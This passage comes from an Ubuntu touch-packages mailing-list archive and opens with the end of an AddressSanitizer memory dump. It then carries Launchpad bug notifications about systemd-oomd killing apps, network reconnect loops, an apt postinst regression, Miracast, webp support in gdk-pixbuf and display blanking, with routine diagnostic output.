0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3 0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3763372==ABORTING Thanks To manage notifications about this bug go to:
[Touch-packages] [Bug 1972159] Re: systemd-oomd frequently kills firefox and visual studio code
The issue is now being discussed also on https://lists.ubuntu.com/archives/ubuntu-devel/2022-June/042116.html -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1972159 Title: systemd-oomd frequently kills firefox and visual studio code Status in systemd package in Ubuntu: Incomplete Bug description: Since I installed Ubuntu 22.04, firefox and visual studio code are frequently killed by systemd-oomd (every 2hours). I have 8 GB memory and never experienced this before the upgrade to Ubuntu 22.04. I thus assume that the claim that there is not enough memory is abusive. Did 64GB of memory become the minimum requirement to run Ubuntu ? The second problem is that it gives a very bad user experience which is critical for new Ubuntu users. There should be a warning prior killing apps to give the opportunity to save the app data. There should at least be an apologize and an explanation after killing the app. The current behavior gives the impression that Ubuntu 22.04 is unreliable and unsafe to use which is a problem for an LTS release that many people might want to use for critical production context. There might be a configuration problem with systemd-oomd or simply a bogus behavior. I would recommend to disable it or remove it completely until this problem is resolved. This is what I will do for myself because I have work to do. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1972159/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1971089] Re: Network Manager bug constant reconnecting and CPU usage
reassigning to miredo then since it seems to be an issue due to this component ** Package changed: network-manager (Ubuntu) => miredo (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/1971089 Title: Network Manager bug constant reconnecting and CPU usage Status in miredo package in Ubuntu: Confirmed Bug description: Anyconnectin result cpu heavy usage. constant reconnections wifi/ethernet..no matter ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: network-manager 1.36.4-2ubuntu1 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Sun May 1 17:00:00 2022 IfupdownConfig: # interfaces(5) file used by ifup(8) and ifdown(8) auto lo iface lo inet loopback InstallationDate: Installed on 2017-06-03 (1793 days ago) InstallationMedia: Kubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) IpRoute: default via 192.168.1.1 dev enp5s0 proto dhcp metric 100 169.254.0.0/16 dev docker0 scope link metric 1000 linkdown 172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown 192.168.1.0/24 dev enp5s0 proto kernel scope link src 192.168.1.148 metric 100 SourcePackage: network-manager UpgradeStatus: Upgraded to jammy on 2022-04-25 (6 days ago) nmcli-nm: RUNNING VERSION STATE STARTUP CONNECTIVITY NETWORKING WIFI-HW WIFI WWAN-HW WWAN running 1.36.4 connected started full enabled enabled enabled enabled disabled To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/miredo/+bug/1971089/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1974456] Re: regression: apt.postint fails if never previously configured
@Sebastian, the SRU needs to be verified for the fix to move to updates, maybe you could help testing the proposed version to help there? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/1974456 Title: regression: apt.postint fails if never previously configured Status in apt package in Ubuntu: Confirmed Status in apt source package in Bionic: Confirmed Status in apt source package in Focal: Fix Committed Bug description: [Impact] bootstrapping a system with apt that fixes #1968154 fails in focal and bionic, as they try to execute the config file that is being removed. This is not a problem on updates, only on new installs, so impact is limited to bootstrapping tools that enable -updates, such as mmdebstrap. [Test case] bootstrapping with -updates enabled can easily be tested with mmdebstrap: mmdebstrap -v focal ~/Projects/Ubuntu/Scratch/focal for example, on focal: Setting up apt (2.0.8) ... /var/lib/dpkg/info/apt.postinst: 65: /etc/kernel/postinst.d/apt-auto-removal: not found dpkg: error processing package apt (--configure): installed apt package post-installation script subprocess returned error exit status 127 [Regression potential] We remove 5 lines from the shell postinst script, there could be syntax errors? But then we'd see those during upgrades, so practically none. [Original bug report] #1968154 removed `/etc/kernel/postinst.d/apt-auto-removal` in this patch: https://git.launchpad.net/ubuntu/+source/apt/commit/?id=f9d2d993687c0d5223c241956ef6a0aabcf15bf0 ...but `apt.postinst` still tries to run it: # create kernel autoremoval blacklist on update if dpkg --compare-versions "$2" lt 0.9.9.3; then /etc/kernel/postinst.d/apt-auto-removal fi If I understand correctly, "$2" is the most-recently-configured- version, and if it's empty `dpkg --compare-versions lt` will evaluate to true. This fails when I'm building a focal (20.04) userspace from scratch: $ dpkg --configure -a [...] Setting up apt (2.0.8) ... /var/lib/dpkg/info/apt.postinst: 65: /etc/kernel/postinst.d/apt-auto-removal: not found dpkg: error processing package apt (--configure): installed apt package post-installation script subprocess returned error exit status 127 It works with apt 2.0.6. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1974456/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978400] Re: GNOME Network Displays does not work with error Authorization supplicant timed out
Thank you for your bug report. wpa 2.10, which is the version included in the current Ubuntu serie, has been released in january where the patch you reference is from 2020, so yes it is included. Could you perhaps report the issue on gnome-n-d gitlab? ** Changed in: wpa (Ubuntu) Importance: Undecided => Low ** Changed in: wpa (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to wpa in Ubuntu. https://bugs.launchpad.net/bugs/1978400 Title: GNOME Network Displays does not work with error Authorization supplicant timed out Status in wpa package in Ubuntu: Incomplete Bug description: I have a problem with connecting to a Miracast device via GNOME Network Displays package (https://gitlab.gnome.org/GNOME/gnome-network-displays) on Ubuntu. It sees the device normally (I see the device name in "Available Video Sinks" list), but when I'm trying to connect, after some time I've got the connection failed with the error: ``` p2p-dev-wlp0s20f3: Authorization supplicant timed out ``` Other systems (Android, Windows, MacOS) connects to it successfully. In the https://gitlab.gnome.org/GNOME/gnome-network-displays it's described that wpa_supplicant requires the patch: https://patchwork.ozlabs.org/project/hostap/patch/20200825062902.124600-1-benja...@sipsolutions.net/ Maybe just adding this one-line patch could resolve this issue? Or it is already applied? ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: wpasupplicant 2:2.10-6ubuntu1 ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30 Uname: Linux 5.15.0-25-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Sun Jun 12 09:56:19 2022 InstallationDate: Installed on 2022-04-14 (58 days ago) InstallationMedia: Error: [Errno 13] Permission denied: '/var/log/installer/media-info' SourcePackage: wpa UpgradeStatus: Upgraded to jammy on 2022-04-14 (58 days ago) modified.conffile..etc.cron.daily.apport: [deleted] To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/wpa/+bug/1978400/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1864215] Re: Please add webp loader to gdk-pixbuf
No it's not fixed, the upstream gdk-pixbuf task got closed because they don't want to accept new loaders in source so it needs to be fixed in another component. We should probably push to integrate it as a new package at some point but there hasn't been high demand for it so far and it's not frequent to find webp images yet which means it's still a low priority item. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu. https://bugs.launchpad.net/bugs/1864215 Title: Please add webp loader to gdk-pixbuf Status in gdk-pixbuf: Fix Released Status in gdk-pixbuf package in Ubuntu: Confirmed Status in gdk-pixbuf package in Baltix: Triaged Status in Debian: New Bug description: Attempting to load a webp image -- for instance, https://images.theweek.com/sites/default/files/styles/tw_image_9_4/public/FKK78W.jpg.webp or https://cdn.vox-cdn.com/thumbor/2YtWB5zH7sPycyc0FYv3JSB6SFw=/60x0:1140x720/920x613/filters:focal(60x0:1140x720):format(webp)/cdn.vox-cdn.com/uploads/chorus_image/image/49663815/timburton.0.0.jpg -- in a gdk-pixbuf app results in a "Couldn’t recognize the image file format" error. Bug 1318327 covers this issue in eye of gnome, and bug 1407644 in libwebp, but isn't this really a gdk-pixbuf issue? If it really does belong to libwebp, my apologies, please dup this bug to 1407644 (I'm confident it doesn't belong to eog since I don't use that program; I have other programs that use libgdk-pixbuf). You can probably use eog to test this, or run /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders | grep -i webp (I assume the loader would mention webp if there was a loader for it). I have these packages installed in addition to libgdk-pixbuf2.0-0: libwebp-dev libwebp6 libwebpdemux2 libwebpmux3 webp. file recognizes the format: $ file /tmp/FKK78W.jpg.webp /tmp/FKK78W.jpg.webp: RIFF (little-endian) data, Web/P image, VP8 encoding, 1200x533, Scaling: [none]x[none], YUV color, decoders should clamp ProblemType: Bug DistroRelease: Ubuntu 19.10 Package: libgdk-pixbuf2.0-0 2.40.0+dfsg-1build1 ProcVersionSignature: Ubuntu 5.3.0-40.32-generic 5.3.18 Uname: Linux 5.3.0-40-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu8.4 Architecture: amd64 Date: Fri Feb 21 08:48:36 2020 InstallationDate: Installed on 2019-10-10 (133 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Beta amd64 (20190926.1) SourcePackage: gdk-pixbuf UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/gdk-pixbuf/+bug/1864215/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978401] Re: display turns suddenly off and then on again
A monitor going blank and then coming back almost always means that a stable signal (enough bandwidth) can't be maintained. You should start by trying to replace the DisplayPort cable, or at least re-plugging the one you have. If that doesn't solve it then to at least prove the theory please try using 1920x1080 for a little while. ** Tags added: bandwidth nvidia ** Package changed: xorg (Ubuntu) => nvidia-graphics-drivers-510 (Ubuntu) ** Changed in: nvidia-graphics-drivers-510 (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1978401 Title: display turns suddenly off and then on again Status in nvidia-graphics-drivers-510 package in Ubuntu: Incomplete Bug description: Hi, Randomly the display turns off and then on again. Happens sometimes many times and others times not at all, randomly. Related to https://bugs.launchpad.net/ubuntu/+source/nvidia-graphics- drivers-495/+bug/1956252 ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-37.39-generic 5.15.35 Uname: Linux 5.15.0-37-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 510.73.05 Sat May 7 05:30:26 UTC 2022 GCC version: ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: unknown CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sun Jun 12 09:45:00 2022 DistUpgraded: 2022-04-21 07:46:27,025 DEBUG Running PostInstallScript: '/usr/lib/ubuntu-advantage/upgrade_lts_contract.py' DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: NVIDIA Corporation TU102 [GeForce RTX 2080 Ti Rev. A] [10de:1e07] (rev a1) (prog-if 00 [VGA controller]) Subsystem: Gigabyte Technology Co., Ltd TU102 [GeForce RTX 2080 Ti Rev. A] [1458:37a9] InstallationDate: Installed on 2022-04-03 (69 days ago) InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223) MachineType: Gigabyte Technology Co., Ltd. Z390 AORUS PRO ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-37-generic root=UUID=7d72a26f-7e2e-4ed2-851b-4bedb4181f16 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: Upgraded to jammy on 2022-04-21 (52 days ago) dmi.bios.date: 01/19/2021 dmi.bios.release: 5.13 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: F12l dmi.board.asset.tag: Default string dmi.board.name: Z390 AORUS PRO-CF dmi.board.vendor: Gigabyte Technology Co., Ltd. dmi.board.version: x.x dmi.chassis.asset.tag: Default string dmi.chassis.type: 3 dmi.chassis.vendor: Default string dmi.chassis.version: Default string dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvrF12l:bd01/19/2021:br5.13:svnGigabyteTechnologyCo.,Ltd.:pnZ390AORUSPRO:pvrDefaultstring:rvnGigabyteTechnologyCo.,Ltd.:rnZ390AORUSPRO-CF:rvrx.x:cvnDefaultstring:ct3:cvrDefaultstring:skuDefaultstring: dmi.product.family: Default string dmi.product.name: Z390 AORUS PRO dmi.product.sku: Default string dmi.product.version: Default string dmi.sys.vendor: Gigabyte Technology Co., Ltd. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.110-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.1-1ubuntu2.1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-510/+bug/1978401/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978349] Re: Monitors sometimes permanently blanked after resume
In case there's more than just that amdgpu kernel crash happening please also run: journalctl -b-1 > prevboot.txt and attach the resulting text file here. ** Tags added: amdgpu ** Package changed: xorg (Ubuntu) => linux (Ubuntu) ** Changed in: linux (Ubuntu) Status: New => Incomplete ** Summary changed: - Monitors sometimes permanently blanked after resume + [amdgpu] Monitors sometimes permanently blanked after resume -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1978349 Title: [amdgpu] Monitors sometimes permanently blanked after resume Status in linux package in Ubuntu: Incomplete Bug description: Sometimes monitors don't wake up after resume. Happened couple times with Ubuntu 22.04 so far. Journalctl lists only one instance of this, might have failed to save the logs on other times. kernel BUG at drivers/gpu/drm/amd/amdgpu/../display/amdgpu_dm/amdgpu_dm.c:10039! 1. (assumedly) occurs when resuming from ram 2. suspend chosen from ui 3. resume by clicking key on keyboard 4.-11. not tested yet with mainline builds, since uncertain about how to reproduce reliably. 12. openssh-server only installed after today's instance, so don't have much debug data beyond what was saved in logs before sysrq-sub. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-37.39-generic 5.15.35 Uname: Linux 5.15.0-37-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Jun 10 23:02:04 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, including running git bisection searches GpuHangFrequency: Very infrequently GraphicsCard: Advanced Micro Devices, Inc. [AMD/ATI] Navi 14 [Radeon RX 5500/5500M / Pro 5500M] [1002:7340] (rev c5) (prog-if 00 [VGA controller]) Subsystem: Micro-Star International Co., Ltd. [MSI] Navi 14 [Radeon RX 5500/5500M / Pro 5500M] [1462:3822] InstallationDate: Installed on 2022-04-27 (44 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) MachineType: System manufacturer System Product Name ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-37-generic root=UUID=69fa5235-bbc4-4603-9895-5e7017992b3c ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display Title: Xorg freeze UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 07/16/2012 dmi.bios.release: 4.6 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 2106 dmi.board.asset.tag: To be filled by O.E.M. dmi.board.name: P8B WS dmi.board.vendor: ASUSTeK Computer INC. dmi.board.version: Rev 1.xx dmi.chassis.asset.tag: Asset-1234567890 dmi.chassis.type: 3 dmi.chassis.vendor: Chassis Manufacture dmi.chassis.version: Chassis Version dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr2106:bd07/16/2012:br4.6:svnSystemmanufacturer:pnSystemProductName:pvrSystemVersion:rvnASUSTeKComputerINC.:rnP8BWS:rvrRev1.xx:cvnChassisManufacture:ct3:cvrChassisVersion:skuSKU: dmi.product.family: To be filled by O.E.M. dmi.product.name: System Product Name dmi.product.sku: SKU dmi.product.version: System Version dmi.sys.vendor: System manufacturer version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.110-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.1-1ubuntu2 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: iheino 4966 F pulseaudio /dev/snd/controlC1: iheino 4966 F pulseaudio CRDA: N/A CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME DistroRelease: Ubuntu 22.04 InstallationDate: Installed on 2022-04-27 (44 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) MachineType: System manufacturer System Product Name Package: linux (not installed) ProcFB: 0 amdgpudrmfb ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-37-generic root=UUID=69fa5235-bbc4-4603-9895-5e7017992b3c ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.15.0-37.39-generic 5.15.35 RelatedPackageVersions: linux-restricted-modules-5.15.0-37-generic N/A